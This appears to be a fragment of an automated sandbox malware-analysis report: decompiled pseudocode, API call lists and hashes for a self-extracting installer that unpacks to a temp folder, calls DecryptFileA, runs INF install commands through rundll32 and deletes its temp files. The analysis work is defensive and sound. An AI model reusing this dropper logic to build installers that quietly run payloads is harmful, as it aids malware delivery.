                                                                                                                                                                                                    0x00391dd4
                                                                                                                                                                                                    0x00391dd6
                                                                                                                                                                                                    0x00391ddb
                                                                                                                                                                                                    0x00391ddc
                                                                                                                                                                                                    0x00391dde
                                                                                                                                                                                                    0x00391d64
                                                                                                                                                                                                    0x00391d64
                                                                                                                                                                                                    0x00391d67
                                                                                                                                                                                                    0x00391d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391c67
                                                                                                                                                                                                    0x00391c67
                                                                                                                                                                                                    0x00391c6d
                                                                                                                                                                                                    0x00391c72
                                                                                                                                                                                                    0x00391c74
                                                                                                                                                                                                    0x00391c74
                                                                                                                                                                                                    0x00391c8e
                                                                                                                                                                                                    0x00391c99
                                                                                                                                                                                                    0x00391cc0
                                                                                                                                                                                                    0x00391cf8
                                                                                                                                                                                                    0x00391d07
                                                                                                                                                                                                    0x00391d23
                                                                                                                                                                                                    0x00391d09
                                                                                                                                                                                                    0x00391d14
                                                                                                                                                                                                    0x00391d1b
                                                                                                                                                                                                    0x00391d1b
                                                                                                                                                                                                    0x00391d2b
                                                                                                                                                                                                    0x00391d2d
                                                                                                                                                                                                    0x00391d2d
                                                                                                                                                                                                    0x00391d38
                                                                                                                                                                                                    0x00391d39
                                                                                                                                                                                                    0x00391d46
                                                                                                                                                                                                    0x00391cc2
                                                                                                                                                                                                    0x00391cc2
                                                                                                                                                                                                    0x00391ccc
                                                                                                                                                                                                    0x00391cce
                                                                                                                                                                                                    0x00391cce
                                                                                                                                                                                                    0x00391cdb
                                                                                                                                                                                                    0x00391ce6
                                                                                                                                                                                                    0x00391cee
                                                                                                                                                                                                    0x00391cee
                                                                                                                                                                                                    0x00391e89
                                                                                                                                                                                                    0x00391e91
                                                                                                                                                                                                    0x00391e92
                                                                                                                                                                                                    0x00391e94
                                                                                                                                                                                                    0x00391e97
                                                                                                                                                                                                    0x00391ea4
                                                                                                                                                                                                    0x00391ea4
                                                                                                                                                                                                    0x00391c61
                                                                                                                                                                                                    0x00391c07
                                                                                                                                                                                                    0x00391bd3
                                                                                                                                                                                                    0x00391b7b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00391BE7
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00391BFE
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00391C57
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00391C88
                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00391140,00000000,00000008,?), ref: 00391CB8
                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00391D1B
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                    • API String ID: 383838535-2145762761
                                                                                                                                                                                                    • Opcode ID: 86076646e74dc9f4edb47cc2162ac2ac6e1314a437aba2d1fc8755bf2b4db63f
                                                                                                                                                                                                    • Instruction ID: 4f9e1e7795761fce32df474a7d95eb62a27ccc5b1d99c21346e8e155ea4f855a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86076646e74dc9f4edb47cc2162ac2ac6e1314a437aba2d1fc8755bf2b4db63f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7A15771A0021B6BEF239B28CC45FFA776EEB85310F140299E955B72D0DBB18E85CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 450 392f1d-392f3d 451 392f6c-392f73 call 395164 450->451 452 392f3f-392f46 450->452 461 392f79-392f80 call 3955a0 451->461 462 393041 451->462 454 392f48 call 3951e5 452->454 455 392f5f-392f66 call 393a3f 452->455 459 392f4d-392f4f 454->459 455->451 455->462 459->462 464 392f55-392f5d 459->464 461->462 469 392f86-392fbe GetSystemDirectoryA call 39658a LoadLibraryA 461->469 463 393043-393053 call 396ce0 462->463 464->451 464->455 472 392fc0-392fd4 GetProcAddress 469->472 473 392ff7-393004 FreeLibrary 469->473 472->473 474 392fd6-392fee DecryptFileA 472->474 475 393017-393024 SetCurrentDirectoryA 473->475 476 393006-39300c 473->476 474->473 485 392ff0-392ff5 474->485 478 393054-39305a 475->478 479 393026-39303c call 3944b9 call 396285 475->479 476->475 477 39300e call 39621e 476->477 489 393013-393015 477->489 481 39305c call 393b26 478->481 482 393065-39306c 478->482 479->462 491 393061-393063 481->491 487 39307c-393089 482->487 488 39306e-393075 call 39256d 482->488 485->473 493 39308b-393091 487->493 494 3930a1-3930a9 487->494 498 39307a 488->498 489->462 489->475 491->462 491->482 493->494 499 393093 call 393ba2 493->499 496 3930ab-3930ad 494->496 497 3930b4-3930b7 494->497 496->497 501 3930af call 394169 496->501 497->463 498->487 504 393098-39309a 499->504 501->497 504->462 505 39309c 504->505 505->494
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00392F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                    				_t9 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                    				if( *0x398a38 != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t11 = E00395164(_t52);
                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						return E00396CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t14 = E003955A0(_t53); // executed
                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                    						E0039658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0x39a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0x398a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0x398a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0x398d48 & 0x000000c0;
                                                                                                                                                                                                    									if(( *0x398d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                    										_t41 =  *0x399a40; // 0x3, executed
                                                                                                                                                                                                    										_t26 = E0039256D(_t41); // executed
                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t22 =  *0x398a24; // 0x0
                                                                                                                                                                                                    									 *0x399a44 = _t44;
                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                    										__eflags =  *0x398a38;
                                                                                                                                                                                                    										if( *0x398a38 == 0) {
                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												E00394169(__eflags);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *0x399a30 - _t22; // 0x0
                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t25 = E00393BA2(); // executed
                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t22 =  *0x398a24; // 0x0
                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t27 = E00393B26(_t40, _t44);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                    							E003944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                    							 *0x399124 = E00396285();
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t59 =  *0x399a30 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E0039621E(); // executed
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t49 =  *0x398a24;
                                                                                                                                                                                                    				if( *0x398a24 != 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					_t34 = E00393A3F(_t51);
                                                                                                                                                                                                    					_t52 = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E003951E5(_t49) == 0) {
                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 =  *0x398a38;
                                                                                                                                                                                                    				if( *0x398a38 != 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00392f1d
                                                                                                                                                                                                    0x00392f28
                                                                                                                                                                                                    0x00392f2f
                                                                                                                                                                                                    0x00392f3d
                                                                                                                                                                                                    0x00392f6c
                                                                                                                                                                                                    0x00392f6c
                                                                                                                                                                                                    0x00392f71
                                                                                                                                                                                                    0x00392f73
                                                                                                                                                                                                    0x00393041
                                                                                                                                                                                                    0x00393041
                                                                                                                                                                                                    0x00393043
                                                                                                                                                                                                    0x00393053
                                                                                                                                                                                                    0x00393053
                                                                                                                                                                                                    0x00392f79
                                                                                                                                                                                                    0x00392f80
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392f86
                                                                                                                                                                                                    0x00392f86
                                                                                                                                                                                                    0x00392f93
                                                                                                                                                                                                    0x00392f9e
                                                                                                                                                                                                    0x00392fa0
                                                                                                                                                                                                    0x00392fa6
                                                                                                                                                                                                    0x00392fb8
                                                                                                                                                                                                    0x00392fba
                                                                                                                                                                                                    0x00392fbe
                                                                                                                                                                                                    0x00392fc6
                                                                                                                                                                                                    0x00392fcc
                                                                                                                                                                                                    0x00392fd4
                                                                                                                                                                                                    0x00392fd6
                                                                                                                                                                                                    0x00392fd8
                                                                                                                                                                                                    0x00392fe0
                                                                                                                                                                                                    0x00392fe6
                                                                                                                                                                                                    0x00392fee
                                                                                                                                                                                                    0x00392ff0
                                                                                                                                                                                                    0x00392ff5
                                                                                                                                                                                                    0x00392ff5
                                                                                                                                                                                                    0x00392fee
                                                                                                                                                                                                    0x00392fd4
                                                                                                                                                                                                    0x00392ff8
                                                                                                                                                                                                    0x00392ffe
                                                                                                                                                                                                    0x00393004
                                                                                                                                                                                                    0x00393017
                                                                                                                                                                                                    0x0039301c
                                                                                                                                                                                                    0x00393024
                                                                                                                                                                                                    0x00393054
                                                                                                                                                                                                    0x0039305a
                                                                                                                                                                                                    0x00393065
                                                                                                                                                                                                    0x00393065
                                                                                                                                                                                                    0x0039306c
                                                                                                                                                                                                    0x0039306e
                                                                                                                                                                                                    0x00393075
                                                                                                                                                                                                    0x0039307a
                                                                                                                                                                                                    0x0039307a
                                                                                                                                                                                                    0x0039307c
                                                                                                                                                                                                    0x00393081
                                                                                                                                                                                                    0x00393087
                                                                                                                                                                                                    0x00393089
                                                                                                                                                                                                    0x003930a1
                                                                                                                                                                                                    0x003930a1
                                                                                                                                                                                                    0x003930a9
                                                                                                                                                                                                    0x003930ab
                                                                                                                                                                                                    0x003930ad
                                                                                                                                                                                                    0x003930af
                                                                                                                                                                                                    0x003930af
                                                                                                                                                                                                    0x003930ad
                                                                                                                                                                                                    0x003930b6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039308b
                                                                                                                                                                                                    0x0039308b
                                                                                                                                                                                                    0x00393091
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393093
                                                                                                                                                                                                    0x00393098
                                                                                                                                                                                                    0x0039309a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039309c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039309c
                                                                                                                                                                                                    0x00393089
                                                                                                                                                                                                    0x0039305c
                                                                                                                                                                                                    0x00393061
                                                                                                                                                                                                    0x00393063
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393063
                                                                                                                                                                                                    0x0039302b
                                                                                                                                                                                                    0x00393032
                                                                                                                                                                                                    0x0039303c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039303c
                                                                                                                                                                                                    0x00393006
                                                                                                                                                                                                    0x0039300c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039300e
                                                                                                                                                                                                    0x00393015
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393015
                                                                                                                                                                                                    0x00392f80
                                                                                                                                                                                                    0x00392f3f
                                                                                                                                                                                                    0x00392f46
                                                                                                                                                                                                    0x00392f5f
                                                                                                                                                                                                    0x00392f5f
                                                                                                                                                                                                    0x00392f64
                                                                                                                                                                                                    0x00392f66
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392f66
                                                                                                                                                                                                    0x00392f4f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392f55
                                                                                                                                                                                                    0x00392f5d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00392F93
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00392FB2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00392FC6
                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00392FE6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00392FF8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039301C
                                                                                                                                                                                                      • Part of subcall function 003951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F4D,?,00000002,00000000), ref: 00395201
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-4070797333
                                                                                                                                                                                                    • Opcode ID: a684144c431942f3a097a697d609fb929b6753000cc1155821ccb3a1dbaccfc8
                                                                                                                                                                                                    • Instruction ID: 29612ed1919998d773bb1eeb686294417d5814ba6739626837e24aa68e2bcba9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a684144c431942f3a097a697d609fb929b6753000cc1155821ccb3a1dbaccfc8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9841C670A006059ADF33BB759C4A76B33BCEB85750F02016BE943C6291EF75CE80CA61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00392390(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                    				_t21 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                    				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                    				_t65 = __ecx;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                    					_pop(_t66);
                                                                                                                                                                                                    					_pop(_t46);
                                                                                                                                                                                                    					return E00396CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00391680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                    					_t58 = 0x104;
                                                                                                                                                                                                    					E003916B3( &_v280, 0x104, "*");
                                                                                                                                                                                                    					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                    					_t63 = _t22;
                                                                                                                                                                                                    					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t58 = 0x104;
                                                                                                                                                                                                    						E00391680( &_v276, 0x104, _t65);
                                                                                                                                                                                                    						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                    							_t58 = 0x104;
                                                                                                                                                                                                    							E003916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                    							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                    							DeleteFileA( &_v280);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                    								E003916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                    								_t58 = 0x104;
                                                                                                                                                                                                    								E0039658A( &_v280, 0x104, 0x391140);
                                                                                                                                                                                                    								E00392390( &_v284);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                    					} while (_t36 != 0);
                                                                                                                                                                                                    					FindClose(_t63); // executed
                                                                                                                                                                                                    					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x00392398
                                                                                                                                                                                                    0x0039239e
                                                                                                                                                                                                    0x003923a3
                                                                                                                                                                                                    0x003923a5
                                                                                                                                                                                                    0x003923ae
                                                                                                                                                                                                    0x003923b3
                                                                                                                                                                                                    0x003924cb
                                                                                                                                                                                                    0x003924d2
                                                                                                                                                                                                    0x003924d3
                                                                                                                                                                                                    0x003924d4
                                                                                                                                                                                                    0x003924df
                                                                                                                                                                                                    0x003923c2
                                                                                                                                                                                                    0x003923d1
                                                                                                                                                                                                    0x003923db
                                                                                                                                                                                                    0x003923e4
                                                                                                                                                                                                    0x003923f6
                                                                                                                                                                                                    0x003923fc
                                                                                                                                                                                                    0x00392401
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392407
                                                                                                                                                                                                    0x00392407
                                                                                                                                                                                                    0x00392408
                                                                                                                                                                                                    0x00392411
                                                                                                                                                                                                    0x0039241f
                                                                                                                                                                                                    0x0039247a
                                                                                                                                                                                                    0x00392483
                                                                                                                                                                                                    0x00392495
                                                                                                                                                                                                    0x003924a3
                                                                                                                                                                                                    0x00392421
                                                                                                                                                                                                    0x0039242f
                                                                                                                                                                                                    0x00392453
                                                                                                                                                                                                    0x0039245d
                                                                                                                                                                                                    0x00392466
                                                                                                                                                                                                    0x00392472
                                                                                                                                                                                                    0x00392472
                                                                                                                                                                                                    0x0039242f
                                                                                                                                                                                                    0x003924af
                                                                                                                                                                                                    0x003924b5
                                                                                                                                                                                                    0x003924be
                                                                                                                                                                                                    0x003924c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003924c5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00398A3A,003911F4,00398A3A,00000000,?,?), ref: 003923F6
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,003911F8), ref: 00392427
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,003911FC), ref: 0039243B
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00392495
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 003924A3
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003924AF
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 003924BE
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00398A3A), ref: 003924C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                    • Opcode ID: 22ce4ec4612d0c2eddca7d6466bd79209861e034f25791dea81a029821d6bada
                                                                                                                                                                                                    • Instruction ID: 14a57b2f2b1072cb4603d55d0168a9d21e30bf84afb95e0904242fea1593b188
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22ce4ec4612d0c2eddca7d6466bd79209861e034f25791dea81a029821d6bada
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31B731604B41ABDB23DB64CC8AAEB73ECAFC4305F04492EF55586290EB74990DC792
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                    			E00392BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
